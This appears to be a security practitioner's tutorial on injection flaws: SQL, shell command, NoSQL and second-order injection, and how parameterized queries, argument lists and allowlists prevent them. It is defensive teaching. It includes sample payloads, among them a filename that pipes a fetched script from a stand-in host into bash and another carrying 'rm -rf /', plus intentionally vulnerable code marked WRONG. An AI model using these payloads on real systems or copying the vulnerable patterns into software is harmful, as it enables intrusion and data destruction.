Injection is the oldest trick in the book, and it’s still here. It was at the very top of the OWASP list for years, and even though it’s slid down to A05 in 2025, don’t read that as “solved.” It dropped because frameworks finally started doing the right thing by default, not because developers stopped writing injectable code. I still find injection on assessments regularly - it just hides in the corners now: the one query someone built with string concatenation because the ORM was “too slow,” the shell command that takes a filename from a user, the search box that forwards straight into a NoSQL query.
The concept never changes, which is what I love about teaching it. Injection happens whenever untrusted input gets mixed into a command - SQL, a shell, an LDAP filter, whatever - and the interpreter can’t tell your data from your instructions. The attacker writes input that the interpreter reads as a command. That’s the entire bug. Once it clicks, you start seeing it everywhere, and more importantly, you start seeing the one fix that handles almost all of it.
Quick Answer: What is Injection?
Injection occurs when an application sends untrusted data to an interpreter as part of a command or query, and that data gets executed as code instead of being treated as data. The classic example is SQL injection, but the same flaw shows up in shell commands, LDAP, XPath, NoSQL queries, and more.
Why it’s still on the 2025 list: Frameworks made the safe path easy, but the unsafe path is still right there. Every time a developer builds a query or command by gluing strings together with user input, the door reopens.
The injection types I run into most:
- SQL injection - untrusted input concatenated into a database query
- Command injection - user input passed to a system shell
- NoSQL injection - attacker-controlled structure in MongoDB-style queries
- LDAP / XPath injection - the same pattern in directory and XML queries
- ORM injection - raw query escapes inside an otherwise-safe ORM
Why Injection Refuses to Die
Here’s what keeps it alive: the vulnerable code usually works perfectly for normal input. A login query built with string formatting authenticates real users all day long. It only breaks - spectacularly - when someone feeds it a quote and a comment. So it passes code review, passes tests, ships to production, and sits there as a working feature that happens to also be a complete database takeover waiting to happen.
The Core Mistake, In One Picture
Almost every injection bug I find is the same shape - building a command out of a string:
# THE BUG - user input becomes part of the SQL itself
def get_user(username):
query = f"SELECT * FROM users WHERE username = '{username}'"
return db.execute(query)
# Normal input: alice -> ...WHERE username = 'alice'
# Attacker input: ' OR '1'='1 -> ...WHERE username = '' OR '1'='1'
# Attacker input: '; DROP TABLE users; --
The database has no way to know the attacker’s quote was supposed to be data. It reads the whole string as one query and faithfully executes whatever the attacker assembled. That ' OR '1'='1 turns a login check into “return everyone,” and the classic '; DROP TABLE does exactly what it looks like.
A Couple I Remember
- The “fast” reporting query. A team had a clean ORM everywhere except one analytics endpoint where someone dropped to raw SQL with f-strings “for performance.” A single user-supplied filter parameter there exposed the entire customers table. The ORM had been protecting them everywhere else - they just opened one window.
- The filename that ran commands. An image-processing feature shelled out to a CLI tool and passed the uploaded filename straight into the command string. A filename like
photo.jpg; curl evil.sh | bashturned a thumbnail generator into remote code execution. The feature worked great for every file that wasn’t named like a payload.
How to Actually Stop Injection
The good news with injection is that the fix is almost boringly consistent across types: keep data and commands separate, and let the interpreter handle the data as data. Here’s how that looks in practice.
1. Use Parameterized Queries - Always
This is the whole ballgame for SQL injection. Don’t build queries by concatenation. Use placeholders and pass the values separately, so the database driver keeps your data strictly as data - it can never be reinterpreted as SQL.
# WRONG - string formatting puts input inside the query
query = f"SELECT * FROM users WHERE username = '{username}'"
db.execute(query)
# RIGHT - parameterized; the value can never become SQL
db.execute(
"SELECT * FROM users WHERE username = %s",
(username,),
)
# RIGHT - named parameters, same protection
db.execute(
"SELECT * FROM users WHERE username = :username AND active = :active",
{"username": username, "active": True},
)
The critical detail: the placeholder (%s, ?, or :name depending on your driver) is not string formatting. You are not building the final string yourself - you hand the query and the values to the driver separately, and it does the safe thing. The moment you find yourself using an f-string or .format() or + to assemble SQL, stop. That’s the bug.
2. Prefer an ORM, and Stay on Its Safe Path
ORMs like SQLAlchemy and the Django ORM parameterize everything for you, which is a big reason injection has dropped down the list. Use them for the bulk of your data access. The catch is the escape hatch: the moment you reach for raw SQL, you are responsible for parameterizing again.
# Django ORM - safe by construction
User.objects.filter(username=username)
# SQLAlchemy Core - safe, parameter bound automatically
session.execute(
select(User).where(User.username == username)
)
# Raw SQL escape hatch - STILL must parameterize
session.execute(
text("SELECT * FROM users WHERE username = :u"),
{"u": username}, # never f-string the value into the text()
)
When I audit an ORM-based app, I grep for raw(, .extra(, text(, and execute( - those are where the ORM’s protection ends and human discipline takes over. That’s where the bugs live.
3. Avoid the Shell - Pass Arguments as a List
Command injection has an even cleaner fix: don’t invoke a shell at all. In Python, call subprocess with an argument list and shell=False (the default). With a list, the OS treats each element as a single argument - there’s no shell to interpret ;, |, &&, or backticks, so there’s nothing to inject into.
import subprocess
# WRONG - shell=True parses the whole string; user input can add commands
filename = user_input
subprocess.run(f"convert {filename} thumb.png", shell=True) # RCE waiting to happen
# RIGHT - argument list, no shell; filename is always one argument
subprocess.run(["convert", filename, "thumb.png"]) # shell=False is default
Even a malicious filename like x.jpg; rm -rf / is now harmless - it’s passed to convert as a single (nonsensical) filename argument, not interpreted by a shell. If you absolutely must build a command string, shlex.quote() each piece - but honestly, the argument-list approach is so much safer that I treat shell=True with user input as an automatic finding.
4. Validate and Constrain What You Can’t Parameterize
Parameterization protects values, but some parts of a query can’t be parameters - table names, column names, sort directions, LIMIT clauses. You can’t bind those, so don’t let them come from raw user input. Validate against an allowlist instead.
# Column/direction can't be a bound parameter - use an allowlist
ALLOWED_SORT = {"created_at", "name", "price"}
ALLOWED_DIR = {"ASC", "DESC"}
def build_sort(column: str, direction: str) -> str:
if column not in ALLOWED_SORT or direction not in ALLOWED_DIR:
raise ValueError("Invalid sort parameter")
# Safe: both values are now from a known, fixed set
return f"ORDER BY {column} {direction}"
Allowlisting (“is this one of the handful of values I expect?”) beats blocklisting (“does this contain something bad?”) every time. You’ll never enumerate every malicious input, but you can absolutely enumerate the valid ones. This is also the right mindset for input validation generally: validate type, length, format, and range as defense in depth - just don’t rely on it in place of parameterization.
5. Don’t Forget NoSQL and Other Interpreters
Injection isn’t a SQL-only problem - any interpreter that mixes data and commands is a target. NoSQL databases are a common blind spot because people assume “no SQL, no injection,” which isn’t true. If attacker-controlled input can become query structure (operators, not just values), you have the same flaw.
# WRONG - passing a raw dict from the request lets attackers inject operators
# {"username": {"$ne": null}} matches ANY user
users.find({"username": request_json["username"]})
# RIGHT - coerce to the expected type so input can only be a value
username = str(request_json["username"])
users.find({"username": username})
The same principle covers LDAP filters, XPath queries, template engines, and OS commands: identify every interpreter your input flows into, and make sure input can only ever be data to that interpreter, never structure or commands.
The One That Hides: Second-Order Injection
There’s a flavor of injection that slips past even careful teams, and it’s worth calling out because I’ve watched it survive a clean code review. It’s called second-order (or stored) injection, and the trick is that the malicious input doesn’t do anything when it’s first submitted - it gets safely stored, and then detonates later when some other part of the app pulls it back out and uses it unsafely.
Picture a registration form that correctly parameterizes the INSERT when saving a username. Great - no injection there. But the username it stored is admin'--. Weeks later, an admin dashboard builds a query like f"... WHERE username = '{stored_username}'" to look up that account. The input was trusted because “it’s already in our database” - but it was attacker-controlled all along.
# Step 1: stored SAFELY (parameterized) - reviewers see this and move on
db.execute("INSERT INTO users (username) VALUES (%s)", (username,))
# username = "admin'--" is now sitting in the table, inert
# Step 2: somewhere else, weeks later, it's used UNSAFELY
row = db.fetchone(f"SELECT * FROM audit WHERE actor = '{stored_username}'") # BUG
The lesson I drill into teams: data from your own database is not automatically trustworthy. It might have been attacker-controlled when it went in. Parameterize on the way out too, not just on the way in. The rule is simpler than it sounds - parameterize every query, regardless of where the value came from, and second-order injection disappears along with the first-order kind.
A Quick Injection Self-Audit
When I do a first pass for injection, it’s mostly targeted grepping. You can run the same checks on your own codebase in a few minutes:
- Search for f-strings,
.format(), and+nearexecute(,SELECT,INSERT,UPDATE,DELETE. - Search for
shell=Trueandos.system(- then check whether any argument is user-influenced. - Grep for ORM escape hatches:
raw(,.extra(,text(,RawSQL. - Look at NoSQL calls (
find(,aggregate() that pass request data through without coercing types. - Check that table/column/sort inputs go through an allowlist, not straight into the query.
Each hit is a place where data might be getting treated as a command. Most injection I find starts at exactly one of these lines.
Key Takeaways
After more years of finding injection than I’d like to admit, here’s the short version:
The Mindset
- Injection is a data-vs-command confusion. Every fix is really just “keep the attacker’s input as data.”
- Working code can still be injectable. It behaves perfectly for normal input - that’s why it ships.
- The escape hatches are where the bugs are. ORMs protect you until someone drops to raw SQL or
shell=True.
What Actually Works
- Parameterized queries, always - never build SQL with f-strings,
.format(), or+. - Use an ORM for the bulk of data access, and re-parameterize whenever you go raw.
- Argument lists, not shells -
subprocess.run([...])withshell=False. - Allowlist the parts you can’t parameterize (table/column/sort).
- Coerce types for NoSQL and other interpreters so input can’t become structure.
Injection sliding to A05 is genuinely good news - it means the safe defaults are winning. But it’s not gone, and it never fully will be, because the unsafe path is one f-string away. Master parameterized queries and the argument-list pattern for shells, and you’ve closed off the overwhelming majority of injection I still find in real applications. The fix is old, well-understood, and reliable - you just have to actually use it everywhere, including in that one “fast” query nobody wanted to touch.